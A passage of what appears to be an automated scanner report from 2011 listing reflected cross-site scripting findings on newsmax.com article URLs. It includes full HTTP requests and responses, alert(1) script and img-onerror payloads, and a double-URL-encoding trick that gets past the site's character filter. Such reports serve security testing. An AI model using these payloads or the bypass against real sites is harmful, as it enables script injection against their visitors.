GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922d05f4%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee0d02c828fc HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 42273 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(389922d05f4"><img src=a onerror=alert(1)>e0d02c828fc);" class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fe4e8'%20a%3db%20aa0ecbba7b5 was submitted in the REST URL parameter 7. This input was echoed as fe4e8' a=b aa0ecbba7b5 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922fe4e8'%20a%3db%20aa0ecbba7b5 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41829 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... tp://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922fe4e8' a=b aa0ecbba7b5' class="article_tools_link"> ...[SNIP]...
1.47. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 675bc"><script>alert(1)</script>d246e4dc073 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922?675bc"><script>alert(1)</script>d246e4dc073=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46429 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Atten ...[SNIP]... tp://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922?675bc"><script>alert(1)</script>d246e4dc073=1')" class="article_tools_link"> ...[SNIP]...
1.48. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 141e1'><script>alert(1)</script>499418e84e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922?141e1'><script>alert(1)</script>499418e84e5=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46424 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Atten ...[SNIP]... p://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922?141e1'><script>alert(1)</script>499418e84e5=1' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fb520'%20a%3db%209c85a64cb9 was submitted in the REST URL parameter 2. This input was echoed as fb520' a=b 9c85a64cb9 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/diet-tips-for-athletesfb520'%20a%3db%209c85a64cb9/2011/03/17/id/371695 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46141 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/diet-tips-for-athletesfb520' a=b 9c85a64cb9/2011/03/17/id/371695' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4221'%20a%3db%206a671921781 was submitted in the REST URL parameter 3. This input was echoed as c4221' a=b 6a671921781 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/diet-tips-for-athletes/2011c4221'%20a%3db%206a671921781/03/17/id/371695 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46150 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/diet-tips-for-athletes/2011c4221' a=b 6a671921781/03/17/id/371695' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 67a3c'%20a%3db%203e2e536c989 was submitted in the REST URL parameter 4. This input was echoed as 67a3c' a=b 3e2e536c989 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/diet-tips-for-athletes/2011/0367a3c'%20a%3db%203e2e536c989/17/id/371695 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46150 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/diet-tips-for-athletes/2011/0367a3c' a=b 3e2e536c989/17/id/371695' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cd299'%20a%3db%20b0170ee1c24 was submitted in the REST URL parameter 5. This input was echoed as cd299' a=b b0170ee1c24 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/diet-tips-for-athletes/2011/03/17cd299'%20a%3db%20b0170ee1c24/id/371695 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46150 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/diet-tips-for-athletes/2011/03/17cd299' a=b b0170ee1c24/id/371695' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5912%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e26bbc82e1fc was submitted in the REST URL parameter 7. This input was echoed as b5912"><img src=a onerror=alert(1)>26bbc82e1fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695b5912%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e26bbc82e1fc HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41414 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:15:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(371695b5912"><img src=a onerror=alert(1)>26bbc82e1fc);" class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c062f'%20a%3db%20d7e89e2c5c9 was submitted in the REST URL parameter 7. This input was echoed as c062f' a=b d7e89e2c5c9 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695c062f'%20a%3db%20d7e89e2c5c9 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 40970 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:15:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695c062f' a=b d7e89e2c5c9' class="article_tools_link"> ...[SNIP]...
1.55. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82e4b"><script>alert(1)</script>284a7cdfb01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695?82e4b"><script>alert(1)</script>284a7cdfb01=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46377 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... <a href="javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695?82e4b"><script>alert(1)</script>284a7cdfb01=1')" class="article_tools_link"> ...[SNIP]...
1.56. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3b62'><script>alert(1)</script>c7eed70c3cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695?b3b62'><script>alert(1)</script>c7eed70c3cb=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46372 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695?b3b62'><script>alert(1)</script>c7eed70c3cb=1' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fe5d1'%20a%3db%20781c4f4a53e was submitted in the REST URL parameter 2. This input was echoed as fe5d1' a=b 781c4f4a53e in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5fe5d1'%20a%3db%20781c4f4a53e/2011/03/17/id/389851 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45883 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Top 5 ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5fe5d1' a=b 781c4f4a53e/2011/03/17/id/389851' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 476bb'%20a%3db%209d3ff8534c5 was submitted in the REST URL parameter 3. This input was echoed as 476bb' a=b 9d3ff8534c5 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011476bb'%20a%3db%209d3ff8534c5/03/17/id/389851 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45883 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Top 5 ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011476bb' a=b 9d3ff8534c5/03/17/id/389851' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 162c9'%20a%3db%200e66b1b4ab0 was submitted in the REST URL parameter 4. This input was echoed as 162c9' a=b 0e66b1b4ab0 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03162c9'%20a%3db%200e66b1b4ab0/17/id/389851 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45883 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Top 5 ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03162c9' a=b 0e66b1b4ab0/17/id/389851' class="article_tools_link"> ...[SNIP]...
